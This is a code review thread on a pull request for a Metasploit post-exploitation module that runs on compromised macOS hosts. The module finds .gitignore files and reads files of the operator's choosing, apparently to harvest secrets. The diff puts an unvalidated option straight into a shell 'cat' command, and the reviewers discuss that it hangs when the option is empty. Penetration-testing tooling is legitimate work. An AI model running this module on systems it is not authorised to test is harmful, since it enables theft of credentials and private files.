modules/post/osx/gather/gitignore.rb

```diff
@@ -0,0 +1,38 @@
+class MetasploitModule < Msf::Post
+  include Msf::Post::File
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Git Ignore Retriever',
+        'Description' => %q{
+          This module finds potentially sensitive items by finding .gitignore files.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [ 'N!ght Jmp'],
+        'Platform' => [ 'osx' ],
+        'SessionTypes' => [ 'meterpreter', 'shell' ]
+      )
+ )
+    register_options([
+      OptString.new('MODE', [false, 'Gitignore retrieval modes: 1). Find gitignore file locations. 2). Retrieve specific gitignore/file contents', '']),
+      OptString.new('FILE', [false, 'Filepath of gitignore/file to retrieve (For mode 2)', ''])
+    ])
+  end
+
+  def run
+    mode = datastore['MODE'].to_i
+    file = datastore['FILE']
+    if mode == 1
+      print_status('Fetching .gitignore files')
+      gitlist = cmd_exec('find ~ -name ".gitignore" 2>/dev/null').chomp
+      for ignore in gitlist.split
+        print_good(ignore.to_s)
+      end
+    elsif mode == 2
+      gitignore = cmd_exec("cat #{file}").chomp
```

Comment:
If `file` is empty, then this results in the command `cat` being empty - which I believe hangs indefinitely and kills the meterpreter session 👀 

I think it would be good to add some validation here :+1:

Reply:
Thats strange. I'm unable to replicate the hang. I can still put some validation in to print something if the file is empty. Ill submit the update here shortly.

Reply:
Ah I believe I know what you mean now. My apologies. If the variable FILE is empty, then cat hangs, not the file retrieved being empty.